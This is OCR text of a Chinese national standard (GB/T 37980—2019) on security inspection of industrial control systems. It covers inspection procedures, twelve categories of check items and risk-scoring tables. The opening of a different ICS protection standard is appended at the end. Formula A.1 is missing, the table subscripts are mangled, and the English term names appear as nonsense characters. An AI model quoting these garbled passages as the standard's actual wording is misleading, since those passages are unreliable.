直接关系到后续工作能否顺利开展。本阶段的主要内容是明确检查工作的方式、依据、范围和内容,调 研被检查单位和被检查系统的情况,确定被检查单位的联系人和联络方式,确定检查组成员和检查工 具,制定检查方案和计划并通知被检查单位。 6.1.2 检查准备过程工作内容 根据检查工作的要求,明确安全检查工作的方式,包括监管机构监督检查、企业信息安全自查等。 明确安全检查工作的依据,包括国家信息安全规范性文件及标准、行业信息安全规范性文件及标 准、主管机构要求等。 明确安全检查工作的范围,包括被检查单位、被检查系统、涉及的人员、被检查单位的上级主管单位 等,并通过调研形成“工业控制系统信息安全检查工作调研表”。 明确安全检查工作的内容。由两部分内容组成, 一部分为基本检查内容,相关要求详见本标准第8 章;另外一部分为补充检查内容,由检查机构在每次检查前,依据有关主管单位要求、信息安全发展态势 和企业的信息安全管理工作开展情况进行拟定。 由检查机构统一组织实施检查工作,确定现场检查组的人员和设备,可委托第三方信息安全服务机 构实施现场检查工作,检查机构安排专人陪同。 根据检查工作的内容,制定“工业控制系统信息安全检查方案”“工业控制系统信息安全检查计划” 和“工业控制系统信息安全检查工作表”。 在现场检查开始前,检查组至少提前两天将“工业控制系统信息安全检查方案”和“工业控制系统信 息安全检查计划”下发至被检查单位,明确要求被检查单位对必要的系统和数据进行备份,被检查单位 积极配合,并提供必要的配合人员和办公条件。 6.1.3 检查准备过程的角色和职责 检查机构职责: a) 向被检查单位介绍安全检查的意义和目的、检查流程和工作方法; b) 了解被检查单位的工业控制系统建设状况; c) 指出被检查单位需提供的基本资料; d) 向被检查单位说明检查工作自身的风险和规避方法; e) 准备被检查系统基本情况调查表单; f) 了解被检查系统基本情况; g) 初步分析系统的安全情况; h) 准备检查工具和文档。 被检查单位职责: a) 向检查机构介绍本单位的工业控制系统建设状况与发展情况; b) 准备检查机构需要的资料; c) 为检查人员的信息收集提供支持和协调; d) 根据被检查系统的具体情况,如业务运行高峰期、网络布置情况等,为检查时间安排提供适宜 的建议; e) 备份数据和系统,制定应急预案。 6.2 检查实施 6.2.1 概述 检查实施是检查工作的核心,主要依据检查方案的总体要求将本检查规范的要求落实到实际检查 工作中,通过对被检查单位的人员访谈、文档审查、配置核查和安全测试,并调阅自查或上次检查报告 (如果有),对被检查单位工业控制系统的安全保护现状进行取证,取得分析与总结活动所需的、足够的 证据和资料。 6.2.2 检查实施过程工作内容 检查人员现场填写“工业控制系统信息安全检查工作表”,检查完成后需要由被检查单位签字确认。 现场检查完成后,需要由被检查单位对被检查的运行情况进行确认,并在“工业控制系统运行情况 验证记录”上签字确认,对于因检查工作导致系统运行异常的情况,如实记录,并及时上报主管部门。 现场检查采用的方法和可能的风险如下: a) 现场检查采用的方法主要包括: 1) 人员访谈 检查人员通过与工业控制系统有关人员(个人/群体)进行交流、讨论等活动,获取证据以证明 信息系统安全保护措施是否有效的一种方法。 2) 文档审查 检查人员通过对被检查单位支撑工业控制系统安全建设与运维的安全管理制度、记录等文档 的核查,获取证据以证明工业控制系统的安全保护要求是否全面,安全保护规定是否得到 执行。 3)配置核查 检查人员通过对被检查系统进行观察、查验、分析等活动,获取证据以证明被检查系统安全保 护措施是否有效的一种方法。 4) 安全测试 检查人员使用预定的方法/工具使被检查系统产生特定的行为,通过查看、分析这些行为的结 果,获取证据以证明工业控制系统安全保护措施是否有效的一种方法。在检查中也可不重新 实施安全测试而利用已有的安全测试结果。 b) 该阶段主要可能的风险包括: 1) 验证测试影响工业控制系统正常运行。在现场检查时,需要对设备和系统的安全策略配 置和安全功能进行必要的验证测试,部分测试内容涉及到对设备的操作,可能对系统的运 行造成一定的影响,甚至存在误操作的可能。 2) 工具测试影响工业控制系统正常运行。在现场检查时,有时会使用一些技术测试工具进 行漏洞测试、性能测试甚至抗渗透能力测试等。工具测试可能会对系统的负载造成一定 的影响,其中漏洞测试和渗透测试可能对系统数据造成一定破坏。 3) 原则上检查方不接触被检查系统,避免执行系统数据变更操作,由配合人员根据操作规程 和检查项需求对被检查系统进行核查操作。 6.2.3 现场检查过程的角色和职责 检查机构职责: 利用人员访谈、文档审查、配置核查和安全测试的方法检查系统的保护措施与本标准要求的符合情 况,以及正确性和有效性。 被检查单位职责: a) 协调被检查系统内部相关人员的关系,配合检查工作的开展; b) 回答检查人员的问询,对某些需要验证的内容上机进行操作; c) 协助检查人员实施工具测试并提供有效建议,降低安全检查对系统运行的影响; d) 协助检查人员完成业务相关内容的问询、验证和测试; e) 相关人员对检查结果进行确认。 6.3 检查结果分析 6.3.1 概述 检查结果分析是总结被检查系统整体安全保护能力的综合评价活动,根据现场检查结果和本标准 的相关要求,定位系统的安全保护现状与本标准安全要求之间的差距,并分析这些差距导致被检查系统 面临的风险,从而给出检查结论,形成检查报告和整改通知书。 6.3.2 检查结果分析过程工作内容 现场检查工作完成后,由检查组对检查结果进行整理,采用定性或定量的风险分析方法(参见附录 A), 编制“工业控制系统安全检查报告”。 6.3.3 检查结果分析过程的角色和职责 检查机构职责: a) 分析检查结果,形成检查结论; b) 编制整改通知书,说明被检查系统存在的安全隐患和缺陷,并给出改进建议;将生成的过程文 档归档保存,并将检查过程中生成的电子文档清除。 7 检查内容的选择方法 7.1 全覆盖法 选取检查内容的所有检查项。 7.2 重点项抽取法 根据国家职能部门、上级主管部门或企业对工业控制系统进行安全检查工作的实际预期目标需求, 从检查内容中确定重点检查项,只检查重点项。 7.3 增项检查法 根据国家职能部门、上级主管部门要求和工业控制系统信息安全发展态势等情况,设计检查内容中 未包含的检查项作为新增检查项。 注:对于检查内容的选择,不局限于采取单一方式进行选择,也可根据检查目的,采用多种选择方式相结合,如同时 采用重点项抽取法和增项检查法确定检查内容。 8 检查内容 8.1 概述 参考 GB/T 22239—2008、GB/T 20269—2006 和 GB/T 20984—2007,结合工业控制系统特性,将 工业控制系统安全检查内容分为十二类,分别是组织体系、规章制度、资金保障、人员安全管理、服务外 包管控、关键信息资产管控、工业控制系统建设安全管理、网路安全防护、上位机主机和设备安全防护、 物理环境安全防护、运行安全管理和应急管理。检查内容分类表参见附录 B。 8.2 组织体系 8.2.1 第一责任人确立 本检查项包括: 检查企业主要负责人是否是信息安全第一责任人。 检查要素: 信息安全第一责任人。 检查方法: 文档审查,查看信息安全文件。 8.2.2 信息安全责任落实 本检查项包括: a) 检查是否设立工业控制系统信息安全管理工作的职能部门,是否设立安全主管、系统管理员、 网络管理员、安全管理员等岗位。 b) 是否以文件的形式明确责任部门、责任人员的职责。 检查要素: 信息安全责任部门、责任人员。日常安全生产管理体系。 检查方法: 文档审查,查看信息安全责任部门、责任人员职责文件。日常安全生产管理体系职责文件。 8.2.3 专职机构及岗位设置 本检查项包括: 检查组织的信息安全管理部门及岗位设置是否符合以下要求: a) 企业集团公司总部设置工业控制系统信息安全专职管理机构。 b) 企业集团公司二级单位设置工业控制系统信息安全管理和技术岗位。 c) 工业控制系统基层单位设置信息安全岗位。 检查要素: 企业级别、信息安全管理部门及岗位设置。 检查方法: a) 人员访谈,访问企业所属级别和信息安全管理部门及岗位设置。 b) 文档审查,根据企业级别查看信息安全管理部门及岗位设置说明文件。 8.2.4 安全人员配置 本检查项包括: 检查企业是否配备一定数量的专职信息安全工作人员,能否满足企业信息安全岗位需求。 检查要素: 专职信息安全工作人员数量、信息安全岗位数量。 检查方法: 文档审查,查阅企业网络职责说明及人员岗位职责分配说明。 8.3 规章制度 8.3.1 整体策略及总体方案制定 本检查项包括; 检查企业是否制定符合国家及行业政策要求的工业控制系统信息安全工作整体策略和总体方 案,是否说明了信息安全工作总体目标、范围、防护框架和防护措施。 检查要素: 信息安全工作整体策略、总体方案、信息安全工作总体目标、范围、防护框架和防护措施。 检查方法: 文档审查,查阅信息安全整体策略和总体方案文档。 8.3.2 制度制定及体系完整性 本检查项包括; 检查企业是否针对工业控制系统的信息安全工作制定基本安全管理制度,并以此为基础形成 涵盖人员管理、资产管理、介质管理、建设安全管理、运行维护管理、外包服务管理、培训教育等方面 的制度体系。 检查要素: 基本安全管理制度。 检查方法: 文档审查,查阅组织是否制定了基本管理制度,内容是否涵盖人员管理、资产管理、介质管理、 建设安全管理、运行维护管理、外包服务管理、培训教育等方面。 8.3.3 操作规程制定 本检查项包括: 检查企业是否对信息安全运行维护人员执行的日常操作制定运维流程和操作规程。 检查要素: 运维流程、操作规程。 检查方法: 文档审查,查阅组织制定的运维流程和操作规程文档。 8.3.4 制度发布 本检查项包括: 检查企业是否通过正式、有效的方式发布工业控制系统信息安全管理制度。 检查要素: 制度发布方式。 检查方法: 文档审查,查阅安全管理制度发布方式和相关记录。 8.4 资金保障 本检查项包括: 检查企业是否将信息安全建设费用(安全软硬件购置、系统安全功能开发、安全验收测试、安全 咨询与培训、安全专项研究等)和运行维护费用(日常安全运维、监测分析、应急演练、应急保障、信 息安全监督检查、测试评估等)纳入年度预算。 检查要素: 信息安全建设费用、运行维护费用。 检查方法: 文档审查,查看年度预算计划。 8.5 人员安全管理 8.5.1 安全培训与考核 本检查项包括: 检查企业信息安全从业,工业控制系统设计、建设、运维等相关各类人员是否经培训合格后上 岗,是否定期接受相应的政策规划和专业技能培训。 检查要素: 人员安全培训及考核。 检查方法: 文档审查,查阅参加安全培训的人员名单及成绩单。 8.5.2 保密协议签订 本检查项包括: 检查企业是否与安全管理员、系统管理员、网络管理员等关键岗位的人员,工业控制系统相关 设备及系统的开发单位和供应商签署保密协议。 检查要素: 保密协议签订。 检查方法: 文档审查,查阅签署保密协议的人员名单及其岗位或单位。 8.5.3 人员审查 本检查项包括: 检查企业是否对信息安全岗位人员和其他敏感岗位人员实施身份、背景和资质审查。 检查要素: 人员的身份、背景和资质审查制度和审查结果记录。 检查方法: 文档审查,查阅信息安全岗位人员和其他敏感岗位人员的身份、背景和资质审查记录。 8.5.4 岗位调整管控 本检查项包括: 检查企业是否在信息安全岗位人员及其他敏感岗位人员离岗时执行权限回收和离岗承诺书 签署。 检查要素: 人员的权限回收记录、离岗承诺书。 检查方法: 文档审查,查阅信息安全岗位人员及其他敏感岗位人员的回收记录和离岗承诺书。 8.6 服务外包管控 8.6.1 外包服务协议 本检查项包括: 检查企业与合约方签订的外包服务协议中是否具有信息安全管控和保密条款。 检查要素: 外包服务协议。 检查方法: 文档审查,查阅外包服务协议中的信息安全管控和保密条款。 8.6.2 外部人员访问管理 本检查项包括: 检查企业是否对外部人员访问机房等受控区域采取书面审批、人员陪同、进出记录等管控 措施。 检查要素: 受控区域访问控制措施和记录。 检查方法: 文档审查,查阅第三方人员访问管理制度和记录。 8.6.3 远程服务管控 本检查项包括: 检查企业是否采取远程服务,如采取远程服务,针对远程服务访问采取书面审批、访问控制、在 线监测、日志审计等管控措施。 检查要素: 远程服务管控措施和记录。 检查方法: a) 人员访谈,询问对远程服务访问采取的控制措施。 b) 文档审查,查阅远程服务管控措施制度和记录。 c) 配置核查,如采取远程服务,查阅远程服务管控相关审计日志。 8.6.4 现场开发管控 本检查项包括: 检查企业是否采取技术措施实现开发测试环境与实际生产运行环境物理分离,并对开发人员 的活动范围和行为实施管控。 检查要素: 现场开发的管控措施和记录。 检查方法: a) 人员访谈,询问是否将开发测试环境与实际生产环境物理分离。 b) 文档审查,查阅开发人员的活动范围和行为管控制度。 8.7 关键信息资产管控 8.7.1 资产管理 本检查项包括: 检查企业是否识别所有与工业控制系统相关的资产并编制了准确的资产清单,是否对每项资 产明确管理责任人及其职责。 检查要素: 资产清单。 检查方法: 文档审查,查阅资产清单,检查是否识别所有与信息系统相关的资产,是否对每项资产明确管 理责任人及其职责。 8.7.2 资产维修报废管理 本检查项包括: 检查企业是否在系统、设备维修或报废时,选取了可信服务机构并对数据采取了备份、清除等 有效保护措施。 检查要素: 可信服务机构选择、数据保护措施和记录。 检查方法: 文档审查,查阅系统、设备维修或报废管理制度和记录。 8.8 工业控制系统建设安全管理 8.8.1 上线安全测评 本检查项包括: 检查企业工业控制系统在上线前是否通过信息安全测评。 检查要素: 上线前通过安全测评的系统清单、信息系统清单。 检查方法: 文档审查,查阅全部信息系统列表,查阅并统计已通过信息安全测评的系统测评报告。 8.8.2 产品采购和使用 本检查项包括: 检查企业安全产品和密码产品的采购及使用是否符合国家有关规定。 检查要素: 安全产品和密码产品。 检查方法: a) 人员访谈,访谈相关人员是否了解相关制度,是否存在不执行相关制度的特殊情况。 b) 文档审查,查阅企业相关管理制度和资产清单等,检查其采购及使用是否符合国家有关规定。 c) 配置核查,核查已被通报存在隐患的在线运行的系统和设备是否已经整改及相关运行管理和 安全防护措施。 8.8.3 核心产品采购测试 本检查项包括: 企业应用的信息安全产品、系统基础软硬件、系统应用软件、工业控制系统或设备等在采购前 是否通过了安全性测试。 检查要素: 安全性测试报告。 检查方法: 文档审查,查阅企业应用的信息安全产品、系统基础软硬件、系统应用软件、工业控制系统或设 备等的安全性测试报告。 8.9 网络安全防护 8.9.1 网络架构安全 本检查项包括: 检查企业是否根据业务特点对网络进行了分区分域管控,并对不同域之间采取了边界防护 措施。 检查要素: 网络拓扑结构图。 检查方法: a) 人员访谈,访谈企业对网络的分区分域管控情况,了解每个分区边界的防护情况。 b) 文档审查,查看网络拓扑结构图与访谈情况的一致性。 c) 安全测试,利用相关命令语句等测试各分区的连通情况。 8.9.2 控制网边界防护 本检查项包括: 检查企业是否设置控制网边界防护的技术措施,检查网络边界连接情况和安全设备部署情况。 检查要素: a) 控制网边界防护技术措施。 b) 网络边界连接情况。 c) 网络边界安全设备部署情况。 检查方法: a) 人员访谈,询问采取的控制网边界防护的技术措施。 b) 配置核查,检查网络边界连接情况和安全设备部署情况。 c) 安全测试,验证系统是否能够对非授权设备私自联到内部网络的行为进行有效阻断,验证系统 是否能够对内部网络用户私自联到外部网络的行为进行有效阻断。 8.9.3 网络安全审计 本检查项包括: a) 检查企业是否建立控制服务器等工业控制系统关键设备安全配置和审计制度。 b) 检查企业是否设置网络安全审计的技术措施和审计记录保护措施。 检查要素: a) 网络安全审计记录。 b) 网络安全审计记录保护措施。 检查方法: a) 人员访谈,询问采取的网络安全审计的技术措施和审计记录保护措施。 b) 文档审查,查阅控制服务器等工业控制系统关键设备安全配置和审计制度。 c) 配置核查,检查网络安全审计记录,对网络系统中的网络设备运行状况、网络流量、用户行为等 进行日志记录。 8.9.4 网络冗余和容差策略 本检查项包括: 检查企业是否设置网络冗余和容差策略。 检查要素: 网络冗余和容差策略。 检查方法: a) 人员访谈,询问采取网络冗余和容差策略。 b) 配置核查,检查关键节点的网络设备、安全设备的冗余,采用冗余技术设计网络拓扑结构,避免 存在网络单点故障;检查控制网内网络设备、安全设备、重要服务器的备件情况。 8.9.5 远程访问 本检查项包括: 检查企业是否按照远程访问方式的使用限制和操作指南进行远程访问,是否设置远程访问监 控机制,是否设置远程接入授权机制,是否设置远程接入过程安全性保护措施。 检查要素: 远程访问使用限制和操作指南、远程访问监控机制、远程接入授权机制、远程接入过程安全性 保护措施。 检查方法: a) 文档审查,查阅远程访问方式的使用限制和操作指南,对每一个允许远程访问系统的方法建立 使用限制和操作指南。 b) 配置核查,检查远程访问监控机制,监控未经授权的远程访问;检查远程接入授权机制,在建立 远程连接之前应用授权过程;检查远程接入过程安全性保护措施,采取无线组网采取严格的身 份认证、安全监测等防护措施,防止经无线网络进行恶意入侵,尤其要防止通过侵入远程终端 单元(RTU) 进而控制部分或整个工业控制系统,能对非授权的远程访问进行阻断。 8.9.6 移动终端安全接入 本检查包括: 检查企业是否针对移动终端接入采取了安全性检测、书面审批、统一接入管理、访问控制、在线 监测、日志审计等必要管控措施。 检查要素: 移动终端安全管控措施和记录。 检查方法: a) 人员访谈,询问对移动终端接入采取的控制措施。 b) 文档审查,查阅管理制度是否要求移动终端接入前采取安全性检测、书面审批、统一接入管控、 访问控制、在线监测、日志审计等管控措施。 8.10 上位机主机和设备安全防护 8.10.1 补丁更新 本检查项包括: 检查企业是否按照补丁管理制度要求进行可更新补丁的更新。 检查要素: 补丁更新管理制度、补丁更新情况。 检查方法: a) 文档审查,查阅补丁更新管理制度和补丁更新频率。 b) 配置核查,检查主机操作系统和网络设备的补丁更新情况。 c) 安全测试,在确保应用系统的安全前提下,通过漏洞扫描工具验证主机操作系统和网络设备的 补丁更新情况。 8.10.2 恶意代码防护 本检查项包括: 检查企业是否按照恶意代码管理制度要求进行恶意代码检测和可更新恶意代码库的更新。 检查要素: 恶意代码防范管理制度、恶意代码库更新情况。 检查方法: a) 文档审查,查阅恶意代码防范管理制度和更新频率。 b) 配置核查,检查恶意代码检测程序和可更新恶意代码库的更新情况。 8.10.3 系统安全整改加固 本检查项包括: 检查企业生产控制主机和设备中对等级保护测评、风险评估、信息安全检查等工作中发现的问 题是否完成安全整改加固。 检查要素: 安全问题报告、安全整改加固实施工作报告。 检查方法: a) 文档审查,查阅安全问题报告,查阅安全整改加固实施工作报告。 b) 配置核查,检查与验证安全整改加固工作实施情况。 8.10.4 移动存储介质管理 本检查项包括: 检查企业是否设置限制和管理移动存储介质使用的管理和技术措施,是否对移动存储介质的 分发、注册、使用、存放、销毁实施管理。 检查要素: 移动存储介质管理措施。 检查方法: a) 文档审查,查阅移动存储介质安全管理制度。 b) 安全测试,验证系统中是否具备移动存储介质管理技术措施。 8.10.5 上位机终端管控 本检查项包括: 检查生产控制网上位机终端是否实施了安全管控(安全管理、接入管理等)并统一安装防病毒 软件。 检查要素: 终端安全管理措施、实施了安全管控措施的终端。 检查方法: a) 人员访谈,询问采取了何种终端安全管理措施。 b) 文档审查,查阅终端安全管理制度。 c) 配置核查,检查并统计终端安全管理措施部署情况。 8.10.6 主机和设备账号口令管理 本检查项包括: 检查上位机主机和设备中口令设置是否符合口令管理制度要求。 检查要素: 符合口令管理制度要求的主机和设备。 检查方法: a) 文档审查,查阅主机和设备安全检测报告。 b) 配置核查,检查并统计符合口令管理制度要求的主机和设备数量。 8.11 物理环境安全防护 本检查项包括: 检查企业生产控制网机房是否按照等级保护要求落实物理安全防护。 检查要素: 按照等级保护要求落实物理安全防护的机房清单。 检查方法: 文档审查,查阅等级测评报告等并统计按照等级保护要求落实物理安全防护的机房。 8.12 运行安全管理 8.12.1 日常维护 本检查项包括: 检查企业是否按照制定的规章制度、运维流程、操作规程等执行生产控制系统日常维护并有详 尽记录。 检查要素: 日常运维制度、运维流程、操作规程和记录。 检查方法: 文档审查,查阅是否按照制定的规章制度、运维流程、操作规程等执行信息系统日常维护并有 详尽记录。 8.12.2 安全审计 本检查项包括: 检查是否对网络运行日志、操作系统日志、数据库访问日志、业务应用系统运行日志、安全设备 和系统运行日志等进行集中收集、定期分析。 检查要素: 日志集中收集措施、日志定期分析报告。 检查方法: a) 文档审查,查阅是否具备集中日志定期分析报告。 b) 配置核查,检查是否对网络运行日志、操作系统日志、数据库访问日志、业务应用系统运行日 志、安全设备和系统运行日志等进行集中收集。 8.12.3 补丁管理 本检查项包括: 检查企业是否按照补丁管理制度制定补丁升级策略,是否针对关键业务系统建立补丁升级测 试环境或建立了获取已测试补丁的有效渠道。 检查要素: 补丁管理制度和记录、补丁升级策略、补丁升级测试环境或渠道。 检查方法: a) 文档审查,查阅是否具备补丁管理制度,是否明确补丁升级策略,查阅是否具备补丁升级记录。 b) 配置核查,检查是否对关键业务系统建立补丁升级测试环境或建立了获取已测试补丁的有效渠道。 8.12.4 安全监测 本检查项包括: 检查企业是否建立安全监测系统对控制网网络流量、重要网络设备、工控系统终端、病毒木马 情况、安全防护情况等进行实时监测。 检查要素: 安全监测系统、安全监测报告。 检查方法: a) 文档审查,查阅是否描述了安全监测系统的监测对象范围和监测内容,查阅是否具备安全监测 报告。 b) 配置核查,检查安全监测系统的监测对象范围和监测内容。 8.13 应急管理 8.13.1 信息通报 本检查项包括: 检查企业是否建立网络与信息安全信息通报机制,按要求向监管机构通报网络和信息系统安 全状况。 检查要素: 网络与信息安全信息通报机制。 检查方法: 文档审查,查阅是否通过制度建立网络与信息安全信息通报机制,是否明确需要通报的内容和 范围,是否落实负责人员。 8.13.2 应急预案制定 本检查项包括: 检查企业是否按照网络与信息安全应急预案,制定本组织网络与信息安全及专项应急预案。 检查要素: 网络与信息安全应急预案。 检查方法: a) 人员访谈,询问是否制定不同事件的应急预案。 b) 文档审查,查阅是否按照信息安全应急预案,制定本组织网络与信息安全应急预案,是否明确 启动应急预案的条件、应急处理流程、系统恢复流程、事后教育培训和定期审核更新等方面的 内容。 8.13.3 应急演练 本检查项包括: 检查企业是否实施年度应急演练,是否有演练脚本和演练实施记录文档。 检查要素: 应急演练制度和记录。 检查方法: 文档审查,查阅是否制定应急演练制度,是否实施年度应急演练,是否有演练脚本和演练实施记录文档。 8.13.4 应急资源配备 本检查项包括: 检查企业是否根据信息安全工作需求,配置应急支援技术队伍并储备备机备件。 检查要素: 应急支援技术队伍与物资。 检查方法: a) 人员访谈,询问是否具备应急支援技术队伍,是否具备应急备机备件并能正常工作。 b) 文档审查,查阅应急支援技术队伍人员名单,查阅应急备机备件清单。 8.13.5 事故调查 本检查项包括: 检查企业是否按照行业及本单位应急预案要求,配合或组织开展事故调查。 检查要素: 事故调查制度、事故调查记录或报告。 检查方法: a) 人员访谈,询问是否曾配合或组织开展事故调查。 b) 文档审查,查阅信息安全事故调查制度,查阅信息安全事故调查记录或报告是否记录引发安全 事故的原因,是否记录事故调查过程。 定性分析 A.1.1 判断安全问题发生的可能性 判断工业控制系统安全问题发生的可能性是工业控制系统定性分析方法的第一步,其取值范围为 高、中和低,详见表 A.1。 表 A.1 工业控制系统安全问题发生的可能性取值表 标识 定义 高 安全问题出现的频率较高(大于或等于1次/月);或在大多数情况下很有可能会发生;或可以证实多次发生 过;或其实现条件较容易被攻击者获得 中 安全问题出现的频率中等(大于1次/半年);或在某种情况下可能会发生;或被证实曾经发生过;或其实现条 件难以被攻击者获得 低 安全问题出现的频率较小;或一般不太可能发生;或没有被证实发生过;或其实现条件很难被攻击者获得 A.1.2 判断对工业控制系统造成的影响程度 工业控制系统的安全问题被威胁利用后,对工业控制系统安全造成的影响程度取值范围为高、中和 低,详见表 A.2。 表 A.2 对工业控制系统安全造成的影响程度取值表 标识 定义 高 如果安全问题出现,将对工业控制系统造成重大损害 中 如果安全问题出现,将对工业控制系统造成一般损害 低 如果安全问题出现,将对工业控制系统造成较小或轻微损害 判断工业控制系统面临的安全风险 综合 A.1.1 和 A.1.2 的结果,对工业控制系统面临的安全风险进行赋值,风险值的取值范围为高、 中和低,详见表 A.3。 工业控制系统面临的安全风险取值表 标识 描述 高 一旦发生将产生较为严重的经济或社会影响,在一定范围内给组织的经营和组织信誉造成损害 中 一旦发生会造成一定的经济、社会或生产经营影响,但影响面和影响程度不大 低 一旦发生造成的影响程度较低甚至几乎不存在, 一般仅限于组织内部,通过较为简单的手段很快能解决 A.2 定量分析 根据工业控制系统生产企业信息安全工作实际情况是否符合检查项描述,为检查项赋予权重值 (V), 根据检查结果判定赋予量化判定值(P,), 安全检查结果量化由式(A.1) 计算求得, 式中: …………………………(A.1) n 检查项个数; m—— 第 i 检查项中检查条款的个数。 工业控制系统安全各检查项的权重值和量化判定值详见表 A.4。 表 A.4 工业控制系统安全定量分析赋值表 检查类 检查项 权重值 V; 量化判定值 P. ; 组织体系 第一责任人确立 1 符合:P=1 部分符合:P;=0.5 不符合:P;=0 信息安全责任落实 2 符合:P=1 部分符合:P;;=0.5 不符合:P=0 专职机构及岗位设置 2 符合:P;;=1 部分符合:P;=0.5 不符合:P;;=0 安全人员配置 2 P=比值的小数点后两位 规章制度 整体策略及总体方案制定 2 符合:P=1 部分符合:P,=0.5 不符合:P;;=0 制度制定及体系完整性 2 形成体系:0.5<P,,≤1 制定基本制度:0<P≤0.5 无制度:P;;=0 操作规程制定 2 符合:P=1 部分符合:P;;=0.5 不符合:P=0 制度发布 1 符合:P=1 部分符合:P,=0.5 不符合:P;=0 资金保障 经费预算 1 符合:P=1 部分符合:P;=0.5 不符合:P;;=0 GB/T 37980—2019 表 A.4 (续) 检查类 检查项 权重值 V 量化判定值 P;; 人员安全管理 安全培训与考核 1 P;=比值的小数点后两位 保密协议签订 1 P。=比值的小数点后两位 人员审查 1 符合:P;=1 部分符合:P;;=0.5 不符合:P=0 岗位调整管控 1 符合:P=1 部分符合:P;=0.5 不符合:P=0 服务外包管控 外包服务协议 1 符合:P=1 部分符合:P,=0.5 不符合:P=0 外部人员访问管理 1 符合:P=] 部分符合:P;=0.5 不符合:P=0 远程服务管控 2 符合:P;=1 部分符合:P;=0.5 不符合:P;=0 现场开发管控 1 符合:P=1 部分符合:P,=0.5 不符合:P=0 关键信息 资产管控 资产管理 1 符合:P=1 部分符合:P,=0.5 不符合:P,=0 资产维修报废管理 1 符合:P;,=1 部分符合:P=0.5 不符合:P;;=0 工业控制系统 建设安全管理 上线安全测评 1 P;=比值的小数点后两位 产品采购和使用 1 符合:P=1 部分符合:P;=0.5 不符合:P=0 核心产品采购测试 1 符合:P=1 部分符合:P,=0.5 不符合:P;;=0 GB/T 37980—2019 表 A.4 ( 续 ) 检查类 检查项 权重值 V; 量化判定值 P;; 网络安全防护 网络架构安全 2 符合:P=1 部分符合:P;=0.5 不符合:P;;=0 控制网边界防护 2 符合:P=1 部分符合:P;=0.5 不符合:P;;=0 网络安全审计 1 符合:P;=1 部分符合:P;;=0.5 不符合:P=0 网络冗余和容差策略 2 符合:P=1 部分符合:P;=0.5 不符合:P=0 远程访问 1 符合:P=1 部分符合:P,=0.5 不符合:P=0 移动终端安全接入 1 符合:P=] 部分符合:P;=0.5 不符合:P=0 上位机主机和 设备安全防护 补丁更新 1 符合:P;=1 部分符合:P;=0.5 不符合:P;=0 恶意代码防护 2 符合:P=1 部分符合:P,=0.5 不符合:P=0 系统安全整改加固 2 P=比值的小数点后两位 移动存储介质管理 1 符合:P=1 部分符合:P;=0.5 不符合:P;;=0 上位机终端管控 2 P;;=比值的小数点后两位 主机和设备账号口令管理 2 P;=比值的小数点后两位 物理环境 安全防护 机房安全建设 2 P;=比值的小数点后两位 GB/T 37980—2019 表 A.4 (续) 检查类 检查项 权重值 V; 量化判定值 P;; 运行安全管理 日常维护 2 符合:P=1 部分符合:P=0.5 不符合:P;=0 安全审计 1 未开启日志审计功能,P.,=0 仅开启日志审计功能,P.,=0.3 开启日志审计功能并定期分析,0.3<P≤0.7 实施日志集中审计和分析预警,0.7<P <1 补丁管理 2 符合:P=1 部分符合:P,=0.5 不符合:P=0 安全监测 2 符合:P;=1 部分符合:P,=0.5 不符合:P=0 应急管理 信息通报 1 符合:P=] 部分符合:P;=0.5 不符合:P;;=0 应急预案制定 1 符合:P;;=1 部分符合:P;=0.5 不符合:P;;=0 应急演练 1 符合:P=1 部分符合:P;=0.5 不符合:P;;=0 应急资源配备 1 符合:P,=1 部分符合:P,=0.5 不符合:P=0 事故调查 1 符合:P=1 部分符合:P;=0.5 不符合:P;=0 注:权重值及量化判定值是根据实际项目实施经验总结进行设置的,标准使用者可根据实际情况进行调整和 优化。 GB/T 37980—2019 附 录 B (资料性附录) 检查内容分类表 工业控制系统安全检查内容分类按表 B.1。 表 B.1 工业控制系统安全检查内容分类表 序号 检查类 检查项 1 组织体系 第一责任人确立 信息安全责任落实 专职机构及岗位设置 安全人员配置 2 规章制度 整体策略及总体方案制定 制度制定及体系完整性 操作规程制定 制度发布 3 资金保障 经费预算 4 人员安全管理 安全培训与考核 保密协议签订 人员审查 岗位调整管控 5 服务外包管控:外包服务协议、外部人员访问管理、远程服务管控、现场开发管控 6 关键信息资产管控:资产管理、资产维修报废管理 7 工业控制系统建设安全管理:上线安全测评、产品采购和使用、核心产品采购测试 8 网络安全防护:网络架构安全、控制网边界防护、网络安全审计、网络冗余和容差策略、远程访问、移动终端安全接入 上位机主机和设备安全防护:补丁更新、恶意代码防护、系统安全整改加固、移动存储介质管理、上位机终端管控、主机和设备账号口令管理、物理环境安全防护、机房安全建设 11 运行安全管理:日常维护、安全审计、补丁管理、安全监测 12 应急管理:信息通报、应急预案制定、应急演练、应急资源配备、事故调查
standards
信息安全技术 工业控制系统 安全防护技术要求和测试评价方法 Information security technology—Security protection technical requirements and testing evaluation methods of industrial control systems 本文件结合国家已发布的法律法规、政策性文件和标准,并重点根据 GB/T22239 — 2019《信息安 全技术 网络安全等级保护基本要求》增加和细化安全防护技术指标、控制点和控制项,为相关方开展 工业控制系统安全等级保护和日常安全防护工作提供更具操作性的依据。 信息安全技术 工业控制系统 安全防护技术要求和测试评价方法 1 范围 本文件规定了工业控制系统安全防护技术要求、保障要求和测试评价方法。 本文件适用于工业控制系统建设、运营、维护等。 2 规范性引用文件 下列文件中的内容通过文中的规范性引用而构成本文件必不可少的条款。 其中,注日期的引用文 件,仅该日期对应的版本适用于本文件;不注日期的引用文件,其最新版本(包括所有的修改单)适用于 本文件。 GB/T GB/T GB/T GB/T GB/T 7353 — 1999 22239 — 2019 25069 — 2010 36324— 2018 37933 — 2019 工业自动化仪表盘、柜、台、箱 信息安全技术 信息安全技术 信息安全技术 信息安全技术 网络安全等级保护基本要求 术语 工业控制系统信息安全分级规范 工业控制系统专用防火墙技术要求 3 术语和定义 GB/T22239 — 2019、GB/T25069 — 2010、GB/T36324 — 2018和 GB/T37933 — 2019界定的以及 下列术语和定义适用于本文件。 3.1 工业控制资产 犻狀犱狌狊狋狉犻犪犾犮狅狀狋狉狅犾犪狊狊犲狋 工业生产控制过程中具有价值的软硬件资源和数据。 注:包括控制设备、工业主机、网络设备、应用程序、工业数据等。 3.2 中心控制室 犮犲狀狋狉犪犾犮狅狀狋狉狅犾狉狅狅犿 位于组织内,具有生产操作、过程控制、安全保护、仪器仪表维护和生产管理等功能的综合性场所。 3.3 现场控制室 犳犻犲犾犱犮狅狀狋狉狅犾狉狅狅犿 位于组织内生产现场,具有生产操作、过程控制和安全保护等功能的场所。 3.4 现场机柜室 